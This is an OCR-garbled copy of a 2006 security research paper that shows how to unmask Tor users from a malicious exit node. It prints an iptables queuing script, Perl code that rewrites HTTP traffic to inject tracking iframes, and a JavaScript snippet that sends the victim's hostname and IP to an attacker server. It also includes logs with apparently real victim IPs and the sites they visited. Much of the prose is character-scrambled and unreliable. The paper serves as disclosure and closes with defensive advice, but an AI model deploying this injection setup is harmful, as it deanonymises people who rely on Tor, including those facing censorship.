Practical Onion Hacking

Pract|ca| 0n|on hack|ng:
F|rd|rg lre rea| address ol Tor c||erls

0ctober 200
wr|ller 0clooer 200 oy ForlCorsu|l's 3ecur|ly Researcr Tear/ArdreW Crr|slerser
0clooer 200, Page 2, Copyr|grl ForlCorsu|l, WWW.lorlcorsu|l.rel

Copyright and 0isclaimer
Tre |rlorral|or |r lr|s adv|sory |s Copyr|grl 200 ForlCorsu|l A/3. ll |s prov|ded so lral our
cuslorers ard olrers urderslard lre r|s| lrey ray oe lac|rg oy rurr|rg allecled sollWare or
lre|r syslers.
lr case you W|sr lo copy |rlorral|or lror lr|s adv|sory, you rusl e|lrer copy a|| ol |l or reler lo
lr|s docurerl (|rc|ud|rg our uRL).
No guararlee / Warrarlee |s prov|ded lor lre accuracy ol lr|s |rlorral|or, or aga|rsl darage you
ray cause your syslers |r lesl|rg.
7he 3ecurity Research 7eam
Tr|s adv|sory ras oeer d|scovered oy ForlCorsu|ls 3ecur|ly Researcr Tear/ArdreW
Crr|slerser.
ForlCorsu|l |s a spec|a||sl |r lecrr|ca| serv|ces W|lr|r lre l|e|d ol lT secur|ly. we are vu|rerao|||ly
experls lral re|p ous|ress erlerpr|ses lo prolecl lrerse|ves aga|rsl lre rurerous secur|ly
lrreals lral ex|sl loday - oolr as |rparl|a| corsu|larls ard W|lr respors|o|||ly lor spec|l|c las|s.
0ur pr|rary serv|ces are secur|ly lesls ard pracl|ca||y-or|erled secur|ly corsu|larcy.
For rore |rlorral|or: WWW.lorlcorsu|l.rel.

7able of Contents
Tre 3ecur|ly Researcr Tear....................................................................... 2
lrlroducl|or........................................................................................... 3
wry We are |oo||rg al lr|s .......................................................................... 3
wral lr|s paper sroWs .............................................................................. 3
loW We d|d |l......................................................................................... 3
wral rappers Wrer soreoody Was revea|ed .................................................... 4
loW lagg|rg / |rjecl|or |s accorp||sred ........................................................... 5
8elore arylr|rg e|se: we reed a Tor rode rurr|rg ........................................... 5
F|rsl: 0uEuE |rleresl|rg dala ................................................................... 5
3ecord, a|ler|rg ard re-|rjecl|rg lre dala W|lr po|rler lo VyEv||weo3erver ................ 6
Tr|rd, 0|ve 'prorerore lTVL pay|oad lo v|cl|rlosl lror VyEv||weo3erver ............ 7
Fourlr, wa|l lor resu|ls........................................................................... 7
Tre Resu|ls: approx|rale|y 100 urras|ed |r a day.............................................. 8
F|asr 0ojecl Resu|ls ............................................................................. 8
F|asr Resu|l Exarp|e............................................................................ 9
Javascr|pl Resu|ls ................................................................................ 9
0N3 c||erl-lagg|rg resu|ls ....................................................................... 9
Corc|us|ors .......................................................................................... 9
Corc|us|ors lor peop|e us|rg Tor ............................................................. 10
3creersrol ol lrjecl|or P|allorr.................................................................. 11


lntroduction
T0R, 'Tre 0r|or Rouler, |s a Peer-lo-Peer aroryr|ly relWor|. A|| users lorWard eacr olrers
lrall|c, resu|l|rg |r lre dala oe|rg so juro|ed arourd or lre relWor| lral |l's very d|ll|cu|l lo
lo||oW. Tr|s paper descr|oes Ways lo l|rd Wro's us|rg Tor, ever Wrer lre dala ras oeer
oourced a|| arourd lre g|ooe, ard ever |l you dor'l rave your oWr pr|vale Ecre|or lo ra|e use
ol.
why we are looking at this
Tr|s paper |sr'l oe|rg Wr|ller oecause We lr|r| Tor |s a oad lr|rg. 0esp|le lre lacl lral We
Walcred Tor oe|rg used lo access A|-0aeda v|deo s|les ard cr||d porr dur|rg Wr|l|rg lr|s arl|c|e,
We a|so ooserved |l oe|rg used lo access Arresly lrlerral|ora| - |r olrer Words, po||l|ca| speecr
s|les lral are |roWr lo oe or (lor exarp|e) 3aud| Arao|ar ard Cr|rese l||ler ||sls
(rllp://WWW.operrel|r|l|al|ve.rel/slud|es/saud|/ ). 0|ver lral, lre rary good uses ol Tor ray
oulWe|gr lre rary oad uses; We pass ro judgrerl or Tor |lse|l. As Tor's crealors rave sa|d
oelore: lre oad guys a|ready rave aroryr|ly aryWays.
To oe roresl, We Wrole lr|s paper s|rp|y oecause |l's ar |rleresl|rg proo|er, oolr lror lre
perspecl|ve ol roW lo oesl ra|e a useao|e P2P aroryr|ly relWor|, as We|| as lre perspecl|ve ol
roW lo orea| ore.
what this paper shows
Tr|s paper |s a lo||oW-up lo our l|rsl Tor paper, 'Pee||rg lre 0r|or. 0ur l|rsl paper suggesled a
ruroer ol lecrr|ques lor revea||rg lre lrue lP ol Tor c||erls, oul d|dr'l preserl lu|| code lo
aclua||y accorp||sr lrer. Tr|s paper derorslrales Wor||rg, pracl|ca| lecrr|ques lor |rjecl|rg
ougs |rlo Tor lrall|c lral resu|l |r lre c||erl revea||rg |lse|l.
C|ear|y Tor's des|grers rave dore a prelly good joo: l cou|dr'l l|rd ary Wea|resses |r Tor |lse|l
lral v|o|ale lre lerels sel oul al rllp://lor.ell.org (oas|ca||y lral erd-lo-erd lrall|c-ara|ys|s |s
a|Ways poss|o|e, oul lre lrall|c ara|ys|s srou|d d|ll|cu|l lo everylr|rg oul a g|ooa| Ecre|or).
3o |rslead, l allac|ed lre dala Wr|cr Tor carr|es lre rosl ol: Weo lrall|c.
Tr|s paper sroWs lral |l you e|lrer rur a Tor ex|l rode or a Weos|le, |l |s qu|le s|rp|e lo p|ace a
Weo oug |r lre Weo lrall|c go|rg lrrougr Tor. Tr|s Weo oug resu|ls |r lre c||erl 'pror|rg rore lo
a 'Wro ar l rea||y deras||rg rode.
how we did it
Ralrer lrar allerpl|rg lo exp|o|l Wea|resses |r Tor, We ra|e use ol lecrro|ogy lral 99 ol lre
peop|e oroWs|rg lre Weo W||| rave erao|ed: Javascr|pl ard F|asr. Trere are lWo lecrr|ques lral
We used:
1. Caus|rg a Weo-oroWser us|rg Tor lo 'prore rore, ouls|de lre Tor relWor|
2. Caus|rg a Weo-oroWser us|rg Tor 'prore rore, |rs|de lre Tor relWor|, ard de||ver
ur|que|y-|derl|ly|rg aooul lre c||erl, sucr as lre corpuler's roslrare ard lP address
lr pracl|ce, lre l|rsl lecrr|que ('prore rore ouls|de Tor) proved very re||ao|e, Wrereas lre
'|rs|de Tor |derl|l|er lecrr|que la||ed prelly rucr corp|ele|y.

what happens when somebody was revealed
Tre lo||oW|rg sequerce ol everls occurs Wrer soreoody |s urras|ed:
1. v|cl|rlosl correcls lrrougr VyTorNode, lo 3oreweo3|le
2. VyTorNode crarges ouloourd lrall|c lo 3oreweo3|le so lral lTTP1.0 ard gz|p
corpress|or are rol used (lTTP readers are slr|pped / crarged)
3. VyTorNode rep|aces |roourd lrall|c lror 3oreweo3|le, |rserl|rg ar <|lrare> relererce
lo VyEv||weo3erver. Tr|s relererce a|so corla|rs a recogr|zao|e Coo||e
1. VyEv||weo3erver rece|ves requesl v|a Tor lror v|cl|rlosl, |rc|ud|rg Coo||e, serves up
Tr|gger. Tr|gger corla|rs:
Javascr|pl code lral requesls '/v|cl|rloslNare_v|cl|rlosllP.g|l lror
VyEv||weo3erver
A 3roc|Wave F|asr Vov|e lral ra|es a d|recl correcl|or lo VyEv||weoserver
(s|rce F|asr doesr'l supporl / |roW aooul Tor / prox|es / elc, lr|s W||| oe a d|recl
correcl|or)
5. Javascr|pl execul|rg or v|cl|rlosl ra|es v|cl|rlosl correcls v|a Tor ard requesl
/v|cl|rloslNare_v|cl|rlosllP.g|l
. 3roc|Wave l|asr execul|rg or v|cl|rlosl correcls d|recl|y, W|lroul Tor, ard reserds
lre Coo||e, a||oW|rg rapp|rg oelWeer lre or|g|ra| page oe|rg oroWsed v|a Tor, ard lre
rea| v|cl|rlosllP

W
e
b
re
q
u
e
s
t fro
m
V
ic
tim
H
o
s
t v
ia
T
o
r
H
T
T
P
/1
.0
, n
o
G
Z
P
, C
o
n
n
e
c
tio
n
: c
lo
s
e

Dagram 1 - Overvew of Tor 1n]ecton Net

how tagging / injection is accomplished
lr order lo accorp||sr a|| lr|s, L|rux |pl||ler 0uEuE largel Was used (0uEuE |s roW deprecaled,
oul We crose lo corl|rue us|rg |l as We rave ro reed lor rore lrar ore 0uEuE, ard as We
d|dr'l rave l|re yel lo reWr|le lre Per| 0uEuE rard||rg rodu|e Wr|cr car oe lourd or
rllp://WWW.cpar.org).
efore anyth|ng e|se: we need a Tor node runn|ng
8elore go|rg ary larlrer, We oov|ous|y reed a Tor rode rurr|rg. Tr|s Was sel up, ard lre
l|rgerpr|rl Was serl lo lre Tor ops, |r order lo ra|e our ev|| Ecre|or rode |oo| a ||ll|e rore
lruslWorlry lo c||erls. F|ra||y, We rod|l|ed lorrc lo a||oW or|y |rleresl|rg lrall|c lo lrars|l our Tor
rode:

# I dont want people connecting back into Tor, from my Tor node
ExitPolicy reject 127.0.0.0/8:*

# block filetrading sites rapidshare.de and up-file.com
# it is no fun having all bandwidth wasted on CSI episodes

# block porn sites using all bandwidth, one example shown below
ExitPolicy reject 146.82.200.248:*

# Crap... observed people looking at childporn
# (nakedlola.com, young-sweet-girls.com)

# allow snarfable traffic, reject everything else
ExitPolicy accept *:80
ExitPolicy reject *:*
F|rst: 0UEUE |nterest|ng data
8as|ca||y, We use |plao|es lo 0uEuE lre lo||oW|rg lrall|c:
1. A|| ouloourd pac|els desl|red lo porl 80 Wr|cr are rol go|rg lo arolrer Tor rode
2. A|| |roourd lrall|c or|g|ral|rg lror porl 80, ard rol lror arolrer Tor rode
Tre lo||oW|rg code ('|plao|es-exc|ude-lorrode) |s used lo accorp||sr lr|s:
echo Saving old ruleset to iptables.bak
iptables-save > iptables.bak
echo Flushing old ruleset
iptables --flush
echo Allowing traffic related to Tor nodes
for tornode in `cat /var/lib/tor/cached-directory |grep '^router
' | awk '{print $3}'|sort|uniq`; do echo -e "Allowing traffic to
Tornode $tornode \r"; iptables -I INPUT -p tcp -m tcp --sport
80 -s $tornode -j ACCEPT; iptables -I OUTPUT -p tcp -m tcp --
0clooer 200, Page , Copyr|grl ForlCorsu|l, WWW.lorlcorsu|l.rel

dport 80 -d $tornode -j ACCEPT; done
echo Done allowing Tor nodes traffic
echo Allowing traffic to/from our evil webserver
iptables -A INPUT -d 11.22.111.222 -p tcp -m tcp --dport 80 -j
ACCEPT
iptables -A OUTPUT -s 11.22.111.222 -o eth0 -p tcp -m tcp --sport
80 -j ACCEPT
echo Allowing re-injected traffic
iptables -A OUTPUT -o lo -j ACCEPT
iptables -A INPUT -i lo -j ACCEPT
iptables -A OUTPUT -p tcp -m tos --tos Minimize-Cost -j ACCEPT
iptables -A OUTPUT -p tcp -m ttl --ttl-eq 255 -j ACCEPT
echo QUEUEing victims
iptables -A INPUT -i eth0 -p tcp -m tcp --sport 80 -j QUEUE
iptables -A OUTPUT -p tcp -m tcp --dport 80 -m owner --uid-owner
debian-tor -j QUEUE
8econd, a|ter|ng and re-|nject|ng the data w|th po|nter to HyEv||web8erver
w|lr lre |rleresl|rg lrall|c 0uEuE'd, lre rexl slep |s lo l|rd lre dala, crarge arylr|rg We reed
lo |r |l, ard lrer re|rjecl lre pac|el. To avo|d oolr lre or|g|ra| ard rod|l|ed pac|els oolr go|rg
oul lre W|re, We NF_0R0P lre or|g|ra| pac|el, ard lrer creale ard |rjecl a raW pac|el oased or
lre or|g|ra| oul W|lr our rod|l|cal|ors.
Tre lo||oW|rg code excerpl perlorrs lrese rod|l|cal|ors, ard used lWo Per| rodu|es, ore lo
rece|ve lre 0uEuE dala, ard ore lo re-|rjecl |l. Trese rodu|es are:

1. use IPTables::IPv4::IPQueue qw(:constants);
2. use Net::RawIP;

(Nole lral lre |rjecled lag |s '<|lrare re|grl=1 src=rllp://xxx.d|/lPTA0lEX.r />, Wrere
lPTA0lEX W||| oe rep|aced or lre l|y W|lr lre lP ol 3oreweo3erver).

# alter traffic destined to port 80
# make traffic easier to watch, http 1.0 and no gzip
if($portdest == 80){
if(($tcpdata =~ m/Accept-Encoding/mgs)
or ($tcpdata =~ m/HTTP\/1.1/)){
$tcpdata =~ s/Accept-Encoding: /Fuzzzzy-Animals: /g;
$tcpdata =~ s/HTTP\/1.1/HTTP\/1.0/g;
}
}
0clooer 200, Page Z, Copyr|grl ForlCorsu|l, WWW.lorlcorsu|l.rel

# alter traffic returned from port 80
# HTTP traffic -- inject tracers and anonymize a little
if($portsrc == 80){
if($tcpdata =~ m/$routerip/gsmi){
# replace tags from myip.dk, etc, with filthy untruths:
$tcpdata =~ s/$routerip/$fakeIP/gsm;
}
#inject tracer at specified part of page
if($tcpdata =~ m/$placetag/mgsi){
$tracer = $tracertemplate;
my $hexip = &ipHexEncode($src);
$tracer =~ s/IPTAGHEX/$hexip/gsm;
if($prepost eq $posttag){
$tcpdata =~s/$placetag.{$tracerlength}/$placetag$tracer/gsmi;
}
else{
$tcpdata =~s/.{$tracerlength}$placetag/$tracer$placetag/gsmi;
}
}
}
Th|rd, C|ve "phonehome" hTHL pay|oad to V|ct|mhost from HyEv||web8erver
Al lr|s po|rl, v|cl|rlosl ray rave oeer |rduced lo oroWse lo lre ev|| Weos|le al VyEv||weos|le.
VyEv||weos|le W||| relurr ar lTVL page corla|r|rg lre lo||oW|rg e|ererls:
1. Ar |rage relererce lor a 1x1 p|xe| g|l |rage, rared rllp://C00KlE.x.xxx.d|/x.g|l
2. A 3roc|waveF|asr rov|e lral correcls lo VyEv||weo3erver porl 8080
3. Javascr|pl lral delerr|res lre lP ard roslrare ol lre racr|re |l execules or, ard lrer
serds lr|s dala lo VyEv||weos|le v|a a 0ET requesl.
Fourth, wa|t for resu|ts
ll We are |uc|y, lre v|cl|rC||erl W||| roW correcl |rs|de Tor ard requesl
/v|cl|rC||erlNare_v|cl|rC||erllP.g|l, ard / or W||| prore rore (ouls|de ol Tor) lo our secord
||sler|rg server or porl 8080 (lre porl Was p|c|ed soreWral al rardor oul ol olrer reasorao|e
cro|ces, oul s|rce rary peop|e a|so use proxycra|rs logelrer W|lr Tor, We crose lo use a
corror proxy porl) ard de||ver ar |derl|l|ao|e coo||e.
0N8 c||ent unmask|ng
Tre po|rl ol lre l|rsl ol lrese e|ererls, lre g|l |rage, |s lral lre oroWser ray perlorr a |oca|
rs|oo|up lor C00KlE.x.xxx.d|, ralrer lrar |ell|rg Tor reso|ve lr|s rare. ll lr|s occurs, lre
requesl W||| go lo lre rareserver lor lre x.xxx.d| dora|r, Wr|cr |s co|rc|derla||y sel lo lre lP ol
VyEv||weo3erver. ll We are |uc|y, lr|s ray sroW e|lrer lre lP ol lre c||erl, or al |easl sroW Wral
l3P lrey are us|rg.

Exarp|e ol |rage lag:
<img src=http://DEADBEEF.x.xxx.dk/x.gif height=1 width=1>
Nole lral lr|s lecrr|que re||es lu||y or Tor rol oe|rg used as recorrerded - oul lror our
slardpo|rl, a r|scorl|gural|or |s jusl as good as ary olrer proo|er.
8hockwaveF|ash Phonehome Unmask|ng
us|rg a lecrr|que descr|oed al rllp://dev.dscr|r|.org/soc|eljs/, We cause ary c||erl Wr|cr a||oWs
/ supporls 3roc|WaveF|asr rov|es (.sWl l||es) lo oe rerdered, lo doWr|oad our oWr l|asr rov|e
Wr|cr oas|ca||y jusl correcls lo VyEv||weoserver:8080.
we rad lreor|zed aooul us|rg lr|s lecrr|que |r our l|rsl Tor paper - rere We sroW lral |l Wor|s.
To aouse lr|s, We gererale ar lTVL page or lre l|y Wr|cr ras lre Coo||e va|ue prev|ous|y
gereraled, ard cause lre 3roc|Wave oojecl Wr|cr lre v|cl|rC||erl W||| a|so rece|ve, lo lrarsr|l
lr|s Coo||e va|ue oac| |r lo our server.
Code |s rol reproduced rere, as |l |s oas|ca||y |derl|ca| lo lre soc|eljs uRL sroWr aoove.
Javascr|pt "here's who | am code"
Tr|s |s a 'F|relox-or|y allac| lral We l|rsl saW derorslraled al
rllp://slud1.luW|er.ac.al/~e912518/javas/jrosl|p.rlr|. 3ad|y (lor us, aryWays) lr|s lecrr|que
doesr'l seer lo Wor| very We|| aryrore. ll Wor|ed r|ce|y Wrer We Wrole our l|rsl Tor paper, oul
apparerl|y sore ol lre recerl crarges lo F|relox rade |l slop Wor||rg.
8as|ca||y, We used Voz|||a's Javascr|pl rerder|rg lo reso|ve lre |oca|rosl rare ard lP, sl|c| lr|s
|r a var|ao|e, ard lrer ra|e a requesl lo VyEv||weoserver us|rg lre lP / rare lourd:
<script language=JavaScript>
a = java.net.InetAddress.getLocalHost();
i = a.getHostName();
n = a.getHostAddress();
img = "http://xxx.dk /" + i + n + ".gif";
document.write("<img height=0 width=0 src=" + img + ">");
</script>
7he Results: approximately 100 unmasked in a day
F|ash 0bject Resu|ts
Tre resu|ls sroWed lral lre F|asr oojecl 'oul ol Tor lecrr|que Wor|ed oy lar lre oesl.
Rurr|rg lre |rjecl|or p|allorr lor a day, We Were ao|e lo pos|l|ve|y |derl|ly 8 'lrue lPs, ore ol
Wr|cr We saW persuaded lo correcl lo our prorerore server 81 l|res.
we ooserved lral Cr|rese oroWsers Were rosl |||e|y lo oe urras|ed oy use. we dor'l |roW |l
lr|s |s s|rp|y proporl|ora| lo Wro |s us|rg Tor, or |s a resu|l ol 'popu|ar oroWser lypes / sell|rgs
|r Cr|ra. loWever, lrere are sore |arger rar|l|cal|ors lo lr|s, s|rce Tor's proporerls c|a|r lral
Cr|ra |s ore ol lre courlr|es Wr|cr reeds Tor lre rosl lo ooosl derocral|c speecr.
we lr|r| lr|s lecrr|que cou|d oe rucr rore successlu|, |l |rslead ol us|rg a Javascr|plF|asr
coro|ral|or, We jusl use 'p|a|r l|asr W|lr a rardcoded 'prorerore lP address ard va|ue, ard
|rjecl lr|s d|recl|y |rslead ol |rjecl|rg |l |rs|de ol ar <|lrare>. Tr|s |s oecause Pr|voxy W||| rave

loo easy a l|re l||ler|rg oul dodgy-|oo||rg <|lrare> lags, ard sore peop|e ray rave Javascr|pl
d|sao|ed, oul ray sl||| a||oW F|asr lo d|sp|ay. we d|dr'l do lr|s oas|ca||y oecause We rad ro
des|re lo purcrase lre F|asr aulror|rg loo|.
F|ash Resu|t Examp|e
Ar exarp|e ol sore ol lre resu|ls We oola|red or our prorerore server:
cat phonehome.87.237.113.19 Wed Oct 4 03:12:33 2006.log:
87.237.113.19 Wed Oct 4 03:12:33 2006 Full Data: Browser to:
http://warezok.ru/forum/index.php?__83.222.30.78(Firefox) Cookie:
ufhrcegndvb
Tr|s sroWs:
Tre c||erl's rea| lP: 8Z.23Z.113.19
Tre l|re ol correcl|or (uTC): 0clooer 1
lr
200 al 3:12 |r lre rorr|rg
Tre lype ol c||erl (oased or lre user-Agerl): F|relox
Tre s|le lre c||erl Was oroWs|rg lo Wrer We l|rsl lagged lrer:
(rllp://Warezo|.ru/lorur/|rdex.prp?)
Tre lP ol lre s|le lre c||erl Was oroWs|rg lo, as recorded oased or lre coo||e va|ue:
83.222.30.Z8
Tre Coo||e va|ue lral We rave |r|l|a||y pac|el-|rjecled. Tre c||erl ras passed lr|s va|ue
oac| lo VyEv||weo3erver |r a 0ET requesl, ard lrer serl |l v|a lre F|asr soc|el
correcl|or as We|| - ly|rg everylr|rg logelrer: ulrrcegrdvo
Javascr|pt Resu|ts
Tre Javascr|pl |rjecl|or lecrr|que Was rol very successlu|. we d|dr'l l|rd a s|rg|e rea| lP, ard
or|y gol a leW va||d roslrares oul ol lre exerc|se, rore ol Wr|cr |s ur|que erougr lo oe
|derl|l|ao|e. lr parl|cu|ar, 'uourlu ard 'Karol|x8ox oolr jusl |rd|cale lre rare ol lre 0peral|rg
3ysler oe|rg used ('Karol|x8ox |rd|cales lral a ||rux L|veC0 |s oe|rg used). 'eure|a |s
oov|ous|y rol very ur|que e|lrer.
cat log_server.log |grep 'GET /.*gif'|sort|uniq
GET /eureka127.0.0.1.gif HTTP/1.1
GET /KanotixBox127.0.0.1.gif HTTP/1.1
GET /localhost127.0.0.1.gif HTTP/1.0
GET /localhost127.0.0.1.gif HTTP/1.1
GET /ubuntu127.0.0.1.gif HTTP/1.0
0N8 c||ent-tagg|ng resu|ts
we raver'l ror|lored lr|s, so lrere are ro resu|ls.
Conclusions
we rave N0T lourd ary Wea|resses |r Tor - oul |rslead derorslraled lral Wea|resses /
lealures ol lre sollWare lral uses Tor car oe exp|o|led lo la|e aWay peop|e's pr|vacy /
aroryr|ly.

we oe||eve We rave derorslraled lral |l |s erl|re|y poss|o|e (ever pracl|ca| ard easy) lo urras|
a good porl|or ol lre lrall|c lrars|l|rg Tor, s|rce |l |s oe|rg v|eWed us|rg F|relox ard lrlerrel
Exp|orer, ard |s lrarsr|lled c|earlexl.
we a|so oe||eve lral |l ray oe poss|o|e, oy lagg|rg ard |derl|ly|rg c|earlexl lrall|c ard |earr|rg
aooul lre sollWare used or a g|ver c||erl, lo 'va||dale ercrypled lrall|c, al |easl parl ol lre l|re.
Tr|s cou|d oe dore oy ou||d|rg a dalaoase ol lre 33L properl|es ol d|llererl vers|ors ol lor
exarp|e w|rdoWs or L|rux, ard rapp|rg lrese properl|es lo lre sollWare vers|ors arrourced |r
c|earlexl lrall|c.
6onc|us|ons for peop|e us|ng Tor
we lu||y expecl (ard perraps rope) lral lr|s paper W||| re|p |rprove lre scruooers (|||e pr|voxy)
lral supporl Tor ard s|r||ar projecls
1
.
wral We rave sroWr rere |s aoso|ule|y rol loo|prool. ll a persor Warled lo oe aroryrous, lre
s|rp|esl lecrr|ques lo deleal Wral We rave sroWr rere are:
1. Turr|rg oll F|asr, Acl|veX, Java, Javascr|pl, ard prelly rucr everylr|rg e|se lral ra|es
Weos|les exc|l|rg lo rar|el|rg ard sa|es peop|e
2

a. You ray a|so Warl lo avo|d Walcr|rg rov|es or slrear|rg aud|o.
2. Ersur|rg Tor reso|ves rare addresses (use Pr|voxy 3oc|s1a)
3. use 33L, as |l's (ever W|lr se|l-s|gred cerls) al |easl a |ol rarder lo rar|pu|ale lre lrall|c
W|lroul oe|rg delecled (ard W|lr a proper cerl|l|cale a|rosl |rposs|o|e).
1. us|rg Lyrx or olrer lexl-oased oroWsers Wrer poss|o|e.

1
Jusl as a sra|| loolrole: persora||y, |l l Were go|rg lo des|gr a good or|or roul|rg relWor|, l r|grl opl lo go lor
delau|l-rouled vPN lo NAToox lecrro|ogy, |rslead ol Wral |s esserl|a||y proxy lecrro|ogy.

2
urlorlurale|y, rorra| s|les |||e Yaroo, 0oog|e, YouTuoe, elc., W||| orea| Wrer you lurr a|| lr|s oll. Tr|s |s Wry
rosl peop|e rave F|asr, elc., erao|ed, ard Wry |l Was poss|o|e lo d|sc|ose so rary peop|e's lrue lP addresses.

3creenshot of lnjection Platform
Tr|s p|clure sroWs Wral lre |rjecl|or p|allorr |oo|ed |||e Wrer rurr|rg.
Top |ell W|rdoW: ReWr|l|rg ol lTVL pac|els go|rg lror VyTorNode lo Weos|les or lre lrlerrel,
lo |rc|ude <|lrare> relererce (or relurred pac|els lror Weoservers) ard lo rerove lre 'Accepl-
Ercod|rg: gz|p reader (or ouloourd pac|els lo Weoservers).
Tre p|aces |l says 'AN0NYVlZlN0 (22.33.111.555), VyTorNode lP address Was delecled |r
lre pac|el, lor exarp|e as a resu|l ol soreore v|s|l|rg Wral|sry|p.cor. l rep|aced ry oWr lP
W|lr oov|ous garoage (lr|s does rol app|y lo lrall|c lo Tor d|rservers, lor oov|ous reasors).
V|dd|e |ell W|rdoW: Tre prorerore server, rece|v|rg correcl|ors lror lre F|asr soc|el
correclor.
8ollor |ell W|rdoW: VyEv||weoserver serv|rg up lre l|asr soc|el ard lTVL page W|lr 0N3,
Javascr|pl lr|ggers.
R|grl co|urr W|rdoW: d|reclory ||sl|rg ol lre prorerore |og d|reclory.

Practical Onion Hacking

Uploaded by

Document Information

Copyright

Available Formats

Share this document

Share or Embed Document

Sharing Options

Did you find this document useful?

Is this content inappropriate?

Copyright:

Available Formats

Practical Onion Hacking

Uploaded by

Copyright:

Available Formats

Pract|ca| 0n|on hack|ng:

F|rd|rg lre rea| address ol Tor c||erls

You might also like